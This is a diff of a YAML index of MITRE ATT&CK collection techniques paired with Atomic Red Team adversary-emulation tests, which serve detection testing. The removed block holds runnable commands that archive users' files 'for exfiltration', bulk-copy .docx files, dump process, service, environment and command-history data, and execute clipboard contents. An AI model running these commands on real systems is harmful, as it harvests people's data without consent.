+ Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.
+ - source_name: Cisco Blog Legacy Device Attacks
+ url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
+ description: Omar Santos. (2020, October 19). Attackers Continue to Target
+ Legacy Devices. Retrieved October 20, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
@@ -51052,7 +59106,7 @@ command-and-control:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-07-01T18:27:41.755Z'
+ modified: '2020-10-21T15:30:44.964Z'
created: '2018-04-18T17:59:24.739Z'
x_mitre_contributors:
- Josh Day, Gigamon
@@ -51065,12 +59119,13 @@ command-and-control:
- Linux
- macOS
- Windows
+ - Network
x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_is_subtechnique: false
atomic_tests: []
T1071.001:
@@ -51251,2423 +59306,6 @@ command-and-control:
x_mitre_version: '1.1'
x_mitre_is_subtechnique: false
atomic_tests: []
-collection:
- T1560:
- technique:
- created: '2020-02-20T20:53:45.725Z'
- modified: '2020-03-29T18:27:31.040Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a
- description: |-
- An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
-
- Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.
- name: Archive Collected Data
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1560
- url: https://attack.mitre.org/techniques/T1560
- - url: https://en.wikipedia.org/wiki/List_of_file_signatures
- description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
- April 22, 2016.
- source_name: Wikipedia File Header Signatures
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - File monitoring
- - Binary file metadata
- x_mitre_detection: |-
- Archival software and archived files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- identifier: T1560
- atomic_tests:
- - name: Compress Data for Exfiltration With PowerShell
- auto_generated_guid: 41410c60-614d-4b9d-b66e-b0192dd9c597
- description: "An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration.\nWhen the test completes you should find
- the files from the $env:USERPROFILE directory compressed in a file called
- T1560-data-ps.zip in the $env:USERPROFILE directory \n"
- supported_platforms:
- - windows
- input_arguments:
- input_file:
- description: Path that should be compressed into our output file
- type: Path
- default: "$env:USERPROFILE"
- output_file:
- description: Path where resulting compressed data should be placed
- type: Path
- default: "$env:USERPROFILE\\T1560-data-ps.zip"
- executor:
- name: powershell
- elevation_required: false
- command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-
-'
- cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore'
- T1560.003:
- technique:
- created: '2020-02-20T21:09:55.995Z'
- modified: '2020-03-25T22:48:14.605Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b
- description: 'An adversary may compress or encrypt data that is collected prior
- to exfiltration using a custom method. Adversaries may choose to use custom
- archival methods, such as encryption with XOR or stream ciphers implemented
- with no external library or utility references. Custom implementations of
- well-known compression algorithms have also been used.(Citation: ESET Sednit
- Part 2)'
- name: Archive via Custom Method
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1560.003
- url: https://attack.mitre.org/techniques/T1560/003
- - url: http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf
- description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
- the Comings and Goings. Retrieved November 21, 2016.'
- source_name: ESET Sednit Part 2
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_detection: Custom archival methods can be very difficult to detect,
- since many of them use standard programming language concepts, such as bitwise
- operations.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- atomic_tests: []
- T1560.002:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1560.002
- url: https://attack.mitre.org/techniques/T1560/002
- - source_name: PyPI RAR
- url: https://pypi.org/project/rarfile/
- description: mkz. (2020). rarfile 3.1. Retrieved February 20, 2020.
- - source_name: libzip
- url: https://libzip.org/
- description: D. Baron, T. Klausner. (2020). libzip. Retrieved February 20,
- 2020.
- - source_name: Zlib Github
- url: https://github.com/madler/zlib
- description: madler. (2017). zlib. Retrieved February 20, 2020.
- - url: https://en.wikipedia.org/wiki/List_of_file_signatures
- description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
- April 22, 2016.
- source_name: Wikipedia File Header Signatures
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive via Library
- description: |-
- An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
-
- Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.
- id: attack-pattern--41868330-6ee2-4d0f-b743-9f2294c3c9b6
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-29T18:27:30.891Z'
- created: '2020-02-20T21:08:52.529Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Monitor processes for accesses to known archival libraries. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- atomic_tests: []
- T1560.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1560.001
- url: https://attack.mitre.org/techniques/T1560/001
- - source_name: 7zip Homepage
- url: https://www.7-zip.org/
- description: I. Pavlov. (2019). 7-Zip. Retrieved February 20, 2020.
- - source_name: WinRAR Homepage
- url: https://www.rarlab.com/
- description: A. Roshal. (2020). RARLAB. Retrieved February 20, 2020.
- - source_name: WinZip Homepage
- url: https://www.winzip.com/win/en/
- description: Corel Corporation. (2020). WinZip. Retrieved February 20, 2020.
- - url: https://en.wikipedia.org/wiki/List_of_file_signatures
- description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
- April 22, 2016.
- source_name: Wikipedia File Header Signatures
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Archive via Utility
- description: |-
- An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities. Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation: WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt and/or compress data.
-
- Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or `zip` on Windows systems.
- id: attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-25T21:54:37.374Z'
- created: '2020-02-20T21:01:25.428Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known archival utilities. This may yield a significant number of benign events, depending on how systems in the environment are typically used.
-
- Consider detecting writing of files with extensions and/or headers associated with compressed or encrypted file types. Detection efforts may focus on follow-on exfiltration activity, where compressed or encrypted files can be detected in transit with a network intrusion detection or data loss prevention system analyzing file headers.(Citation: Wikipedia File Header Signatures)
- x_mitre_data_sources:
- - Process monitoring
- - Process command-line parameters
- - File monitoring
- - Binary file metadata
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- identifier: T1560.001
- atomic_tests:
- - name: Compress Data for Exfiltration With Rar
- auto_generated_guid: 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0
- description: "An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration.\nWhen the test completes you should find
- the txt files from the %USERPROFILE% directory compressed in a file called
- T1560.001-data.rar in the %USERPROFILE% directory \n"
- supported_platforms:
- - windows
- input_arguments:
- input_path:
- description: Path that should be compressed into our output file
- type: Path
- default: "%USERPROFILE%"
- file_extension:
- description: Extension of files to compress
- type: String
- default: ".txt"
- output_file:
- description: Path where resulting compressed data should be placed
- type: Path
- default: "%USERPROFILE%\\T1560.001-data.rar"
- rar_installer:
- description: Winrar installer
- type: Path
- default: "%TEMP%\\winrar.exe"
- rar_exe:
- description: The RAR executable from Winrar
- type: Path
- default: "%programfiles%/WinRAR/Rar.exe"
- dependencies:
- - description: 'Rar tool must be installed at specified location (#{rar_exe})
-
-'
- prereq_command: 'if not exist "#{rar_exe}" (exit /b 1)
-
-'
- get_prereq_command: |
- echo Downloading Winrar installer
- bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
- echo Follow the installer prompts to install Winrar
- #{rar_installer}
- executor:
- name: command_prompt
- elevation_required: false
- command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension}
-
-'
- cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
-
-'
- - name: Compress Data and lock with password for Exfiltration with winrar
- auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c
- description: |
- Note: Requires winrar installation
- rar a -p"blue" hello.rar (VARIANT)
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- mkdir .\tmp\victim-files
- cd .\tmp\victim-files
- echo "This file will be encrypted" > .\encrypted_file.txt
- rar a -hp"blue" hello.rar
- dir
- - name: Compress Data and lock with password for Exfiltration with winzip
- auto_generated_guid: 01df0353-d531-408d-a0c5-3161bf822134
- description: |
- Note: Requires winzip installation
- wzzip sample.zip -s"blueblue" *.txt (VARIANT)
- supported_platforms:
- - windows
- input_arguments:
- winzip_exe:
- description: Path to installed Winzip executable
- type: Path
- default: "%ProgramFiles%\\WinZip\\winzip64.exe"
- winzip_url:
- description: Path to download Windows Credential Editor zip file
- type: url
- default: https://download.winzip.com/gl/nkln/winzip24-home.exe
- winzip_hash:
- description: File hash of the Windows Credential Editor zip file
- type: String
- default: B59DB592B924E963C21DA8709417AC0504F6158CFCB12FE5536F4A0E0D57D7FB
- dependency_executor_name: powershell
- dependencies:
- - description: 'Winzip must be installed
-
-'
- prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo
- 0)''
-
-'
- get_prereq_command: |
- if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){
- Write-Host Follow the installation prompts to continue
- cmd /c "$env:Temp\winzip.exe"
- }
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- path=%path%;"C:\Program Files (x86)\winzip"
- mkdir .\tmp\victim-files
- cd .\tmp\victim-files
- echo "This file will be encrypted" > .\encrypted_file.txt
- "#{winzip_exe}" -min -a -s"hello" archive.zip *
- dir
- - name: Compress Data and lock with password for Exfiltration with 7zip
- auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198
- description: 'Note: Requires 7zip installation
-
-'
- supported_platforms:
- - windows
- executor:
- name: command_prompt
- elevation_required: false
- command: |
- mkdir $PathToAtomicsFolder\T1560.001\victim-files
- cd $PathToAtomicsFolder\T1560.001\victim-files
- echo "This file will be encrypted" > .\encrypted_file.txt
- 7z a archive.7z -pblue
- dir
- - name: Data Compressed - nix - zip
- auto_generated_guid: c51cec55-28dd-4ad2-9461-1eacbc82c3a0
- description: 'An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration. This test uses standard zip compression.
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- input_files:
- description: Path that should be compressed into our output file, may include
- wildcards
- type: Path
- default: "$HOME/*.txt"
- output_file:
- description: Path that should be output as a zip archive
- type: Path
- default: "$HOME/data.zip"
- dependencies:
- - description: 'Files to zip must exist (#{input_files})
-
-'
- prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ]; then exit 0; else
- exit 1; fi;
-
-'
- get_prereq_command: 'echo Please set input_files argument to include files
- that exist
-
-'
- executor:
- name: sh
- elevation_required: false
- command: 'zip #{output_file} #{input_files}
-
-'
- cleanup_command: 'rm -f #{output_file}
-
-'
- - name: Data Compressed - nix - gzip Single File
- auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af
- description: 'An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration. This test uses standard gzip compression.
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- input_file:
- description: Path that should be compressed
- type: Path
- default: "$HOME/victim-gzip.txt"
- input_content:
- description: contents of compressed files if file does not already exist.
- default contains test credit card and social security number
- type: String
- default: 'confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101'
- executor:
- name: sh
- elevation_required: false
- command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}''
- >> #{input_file}; gzip -k #{input_file})
-
-'
- cleanup_command: 'rm -f #{input_file}.gz
-
-'
- - name: Data Compressed - nix - tar Folder or File
- auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a
- description: 'An adversary may compress data (e.g., sensitive documents) that
- is collected prior to exfiltration. This test uses standard gzip compression.
-
-'
- supported_platforms:
- - linux
- - macos
- input_arguments:
- input_file_folder:
- description: Path that should be compressed
- type: Path
- default: "$HOME/$USERNAME"
- output_file:
- description: File that should be output
- type: Path
- default: "$HOME/data.tar.gz"
- dependencies:
- - description: 'Folder to zip must exist (#{input_file_folder})
-
-'
- prereq_command: 'test -e #{input_file_folder}
-
-'
- get_prereq_command: 'echo Please set input_file_folder argument to a folder
- that exists
-
-'
- executor:
- name: sh
- elevation_required: false
- command: 'tar -cvzf #{output_file} #{input_file_folder}
-
-'
- cleanup_command: 'rm -f #{output_file}
-
-'
- - name: Data Encrypted with zip and gpg symmetric
- auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f'
- description: 'Encrypt data for exiltration
-
-'
- supported_platforms:
- - macos
- - linux
- input_arguments:
- test_folder:
- description: Path used to store files.
- type: Path
- default: "/tmp/T1560"
- test_file:
- description: Temp file used to store encrypted data.
- type: Path
- default: T1560
- encryption_password:
- description: Password used to encrypt data.
- type: string
- default: InsertPasswordHere
- dependency_executor_name: sh
- dependencies:
- - description: gpg and zip are required to run the test.
- prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)"
- ]; then exit 1; fi;
-
-'
- get_prereq_command: 'echo "Install gpg and zip to run the test"; exit 1;
-
-'
- executor:
- name: sh
- elevation_required: false
- command: |
- mkdir -p #{test_folder}
- cd #{test_folder}; touch a b c d e f g
- zip --password "#{encryption_password}" #{test_folder}/#{test_file} ./*
- echo "#{encryption_password}" | gpg --batch --yes --passphrase-fd 0 --output #{test_folder}/#{test_file}.zip.gpg -c #{test_folder}/#{test_file}.zip
- ls -l #{test_folder}
- cleanup_command: 'rm -Rf #{test_folder}'
- T1123:
- technique:
- id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Audio Capture
- description: |-
- An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.
-
- Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1123
- external_id: T1123
- - external_id: CAPEC-634
- source_name: capec
- url: https://capec.mitre.org/data/definitions/634.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-07-14T19:42:10.235Z'
- created: '2017-05-31T21:31:34.528Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.0'
- identifier: T1123
- atomic_tests:
- - name: using device audio capture commandlet
- auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95
- description: "[AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet)\n"
- supported_platforms:
- - windows
- executor:
- command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
-
-'
- name: powershell
- T1119:
- technique:
- created: '2017-05-31T21:31:27.985Z'
- modified: '2020-03-31T22:18:43.019Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- type: attack-pattern
- id: attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Automated Collection
- description: "Once established within a system or network, an adversary may
- use automated techniques for collecting internal data. Methods for performing
- this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)
- to search for and copy information fitting set criteria such as file type,
- location, or name at specific time intervals. This functionality could also
- be built into remote access tools. \n\nThis technique may incorporate use
- of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)
- and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to
- identify and move files."
- external_references:
- - source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1119
- external_id: T1119
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_system_requirements:
- - Permissions to access directories and files that store information of interest.
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_detection: Depending on the method used, actions could include common
- file system commands and parameters on the command-line interface within batch
- files or scripts. A sequence of actions like this may be unusual, depending
- on the system and network environment. Automated collection may occur along
- with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074).
- As such, file access monitoring that shows an unusual process performing sequential
- file opens and potentially copy actions to another location on the file system
- for many files at once may indicate automated collection behavior. Remote
- access tools with built-in features may interact directly with the Windows
- API to gather data. Data may also be acquired through Windows system management
- tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
- and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_data_sources:
- - File monitoring
- - Data loss prevention
- - Process command-line parameters
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- identifier: T1119
- atomic_tests:
- - name: Automated Collection Command Prompt
- auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b
- description: |
- Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
- dir c: /b /s .docx | findstr /e .docx
- for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
- cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
-
-'
- name: command_prompt
- - name: Automated Collection PowerShell
- auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
- description: |
- Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- New-Item -Path $env:TEMP\T1119_powershell_collection -ItemType Directory -Force | Out-Null
- Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination $env:TEMP\T1119_powershell_collection}
- cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force
- -ErrorAction Ignore | Out-Null
-
-'
- name: powershell
- - name: Recon information for export with PowerShell
- auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26
- description: |
- collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- Get-Service > $env:TEMP\T1119_1.txt
- Get-ChildItem Env: > $env:TEMP\T1119_2.txt
- Get-Process > $env:TEMP\T1119_3.txt
- cleanup_command: |
- Remove-Item $env:TEMP\T1119_1.txt -ErrorAction Ignore
- Remove-Item $env:TEMP\T1119_2.txt -ErrorAction Ignore
- Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
- name: powershell
- - name: Recon information for export with Command Prompt
- auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3
- description: |
- collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt
- to see what was collected.
- supported_platforms:
- - windows
- executor:
- command: |
- sc query type=service > %TEMP%\T1119_1.txt
- doskey /history > %TEMP%\T1119_2.txt
- wmic process list > %TEMP%\T1119_3.txt
- tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
- cleanup_command: |
- del %TEMP%\T1119_1.txt >nul 2>&1
- del %TEMP%\T1119_2.txt >nul 2>&1
- del %TEMP%\T1119_3.txt >nul 2>&1
- del %TEMP%\T1119_4.txt >nul 2>&1
- name: command_prompt
- T1115:
- technique:
- id: attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Clipboard Data
- description: "Adversaries may collect data stored in the clipboard from users
- copying information within or between applications. \n\nIn Windows, Applications
- can access clipboard data by using the Windows API.(Citation: MSDN Clipboard)
- OSX provides a native command, pbpaste, to grab clipboard contents.(Citation:
- Operating with EmPyre)"
- external_references:
- - source_name: mitre-attack
- external_id: T1115
- url: https://attack.mitre.org/techniques/T1115
- - external_id: CAPEC-637
- source_name: capec
- url: https://capec.mitre.org/data/definitions/637.html
- - url: https://msdn.microsoft.com/en-us/library/ms649012
- description: Microsoft. (n.d.). About the Clipboard. Retrieved March 29, 2016.
- source_name: MSDN Clipboard
- - url: https://medium.com/rvrsh3ll/operating-with-empyre-ea764eda3363
- description: rvrsh3ll. (2016, May 18). Operating with EmPyre. Retrieved July
- 12, 2017.
- source_name: Operating with EmPyre
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-04-23T18:35:58.230Z'
- created: '2017-05-31T21:31:25.967Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_detection: Access to the clipboard is a legitimate function of many
- applications on an operating system. If an organization chooses to monitor
- for this behavior, then the data will likely need to be correlated against
- other suspicious or non-user-driven activity.
- x_mitre_data_sources:
- - API monitoring
- x_mitre_version: '1.1'
- identifier: T1115
- atomic_tests:
- - name: Utilize Clipboard to store or execute commands from
- auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7
- description: 'Add data to clipboard to copy off or execute commands from.
-
-'
- supported_platforms:
- - windows
- executor:
- command: |
- dir | clip
- echo "T1115" > %temp%\T1115.txt
- clip < %temp%\T1115.txt
- cleanup_command: 'del %temp%\T1115.txt >nul 2>&1
-
-'
- name: command_prompt
- - name: Execute Commands from Clipboard using PowerShell
- auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416
- description: 'Utilize PowerShell to echo a command to clipboard and execute
- it
-
-'
- supported_platforms:
- - windows
- executor:
- command: |
- echo Get-Process | clip
- Get-Clipboard | iex
- name: powershell
- - name: Execute commands from clipboard
- auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff
- description: Echo a command to clipboard and execute it
- supported_platforms:
- - macos
- executor:
- command: |-
- echo ifconfig | pbcopy
- $(pbpaste)
- name: bash
- T1213.001:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1213.001
- url: https://attack.mitre.org/techniques/T1213/001
- - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
- description: Atlassian. (2018, January 9). How to Enable User Access Logging.
- Retrieved April 4, 2018.
- source_name: Atlassian Confluence Logging
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Confluence
- description: |2
-
- Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as:
-
- * Policies, procedures, and standards
- * Physical / logical network diagrams
- * System architecture diagrams
- * Technical system documentation
- * Testing / development credentials
- * Work / project schedules
- * Source code snippets
- * Links to network shares and other internal resources
- id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T16:42:09.222Z'
- created: '2020-02-14T13:09:51.004Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
-
- User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.
- x_mitre_data_sources:
- - Third-party application logs
- - Authentication logs
- x_mitre_platforms:
- - SaaS
- atomic_tests: []
- T1056.004:
- technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Endgame Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
